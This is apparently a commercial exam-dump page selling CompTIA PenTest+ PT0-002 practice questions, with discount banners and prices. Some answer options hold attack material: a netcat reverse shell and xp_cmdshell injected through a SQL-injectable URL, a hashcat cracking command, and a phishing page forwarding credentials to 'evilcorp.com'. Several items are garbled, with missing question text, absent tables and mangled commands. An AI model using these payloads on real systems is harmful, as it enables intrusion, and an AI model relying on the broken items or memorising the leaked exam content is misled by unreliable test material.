Special Summer Sale 70% Discount Offer - Ends in 0d 00h 00m 00s - Coupon code: Board70

PT0-002 Exam Dumps - CompTIA PenTest+ Questions and Answers

Question # 44

Options:

A.

ROE

B.

MOU

C.

SLA

D.

NDA

Buy Now
Question # 45

A penetration tester discovered a vulnerability that has the following CVEs:

Which of the following CVEs should be remediated first?

Options:

A.

CVE-2007-6750

B.

CVE-2011-3192

C.

CVE-2012-2122

D.

CVE-2014-0160

E.

CVE-2017-7494

Buy Now
Question # 46

A penetration tester has compromised a customer's internal network, gaining access to a file server that hosts email server backups. Which of the following is the best tool to assist with data exfiltration?

Options:

A.

SFTP

B.

Nmap

C.

Netcat

D.

SCP

Buy Now
Question # 47

A penetration tester wants to crack MD5 hashes more quickly. The tester knows that the first part of the password is Winter followed by four digits and a special character at the end. Which of the following commands should the tester use?

Options:

A.

John hash.txt --format-MD5 —wordlist-seasons.txt --fork-8 --rules-base64

B.

hashcat hash.txt -m 0 -a € seasons.txt ?d?d?d?d?s

C.

John hash.txt —format=Raw-MD5 —rules=jumbo —wordlist=seasons.txt

D.

hashcat hahs.txt -m 500 -a 7 —force -) -w 4 —opencl-device-types 1,2

Buy Now
Question # 48

A penetration tester observes an application enforcing strict access controls. Which of the following would allow the tester to bypass these controls and successfully access the organization's sensitive files?

Options:

A.

Remote file inclusion

B.

Cross-site scripting

C.

SQL injection

D.

Insecure direct object references

Buy Now
Question # 49

A physical penetration tester needs to get inside an organization's office and collect sensitive information without acting suspiciously or being noticed by the security guards. The tester has observed that the company's ticket gate does not scan the badges, and employees leave their badges on the table while going to the restroom. Which of the following techniques can the tester use to gain physical access to the office? (Choose two.)

Options:

A.

Shoulder surfing

B.

Call spoofing

C.

Badge stealing

D.

Tailgating

E.

Dumpster diving

F.

Email phishing

Buy Now
Question # 50

For a penetration test engagement, a security engineer decides to impersonate the IT help desk. The security engineer sends a phishing email containing an urgent request for users to change their passwords and a link to https://example.com/index.html. The engineer has designed the attack so that once the users enter the credentials, the index.html page takes the credentials and then forwards them to another server that the security engineer is controlling. Given the following information:

Which of the following lines of code should the security engineer add to make the attack successful?

Options:

A.

window.location.= 'https://evilcorp.com '

B.

crossDomain: true

C.

geturlparameter ('username')

D.

redirectUrl = 'https://example.com '

Buy Now
Question # 51

Given the following table:

Which of the following data structures would most likely be used to store known-good configurations of firewall rules in a Python script?

Options:

A.

Lists

B.

Trees

C.

Dictionaries

D.

Tuples

Buy Now
Question # 52

A penetration tester examines a web-based shopping catalog and discovers the following URL when viewing a product in the catalog:

http://company.com/catalog.asp?productid=22

The penetration tester alters the URL in the browser to the following and notices a delay when the page refreshes:

http://company.com/catalog.asp?productid=22;WAITFOR DELAY '00:00:05'

Which of the following should the penetration tester attempt NEXT?

Options:

A.

http://company.com/catalog.asp?productid=22:EXEC xp_cmdshell 'whoami'

B.

http://company.com/catalog.asp?productid=22 ' OR 1=1 --

C.

http://company.com/catalog.asp?productid=22 ' UNION SELECT 1,2,3 --

D.

http://company.com/catalog.asp?productid=22;nc 192.168.1.22 4444 -e /bin/bash

Buy Now
Question # 53

A penetration tester was able to compromise a web server and move laterally into a Linux web server. The tester now wants to determine the identity of the last user who signed in to the web server. Which of the following log files will show this activity?

Options:

A.

/var/log/messages

B.

/var/log/last_user

C.

/var/log/user_log

D.

/var/log/lastlog

Buy Now
Exam Code: PT0-002
Exam Name: CompTIA PenTest+ Certification Exam
Last Update: Mar 31, 2025
Questions: 464
PT0-002 pdf

PT0-002 PDF

$25.5  $84.99
PT0-002 Engine

PT0-002 Testing Engine

$28.5  $94.99
PT0-002 PDF + Engine

PT0-002 PDF + Testing Engine

$40.5  $134.99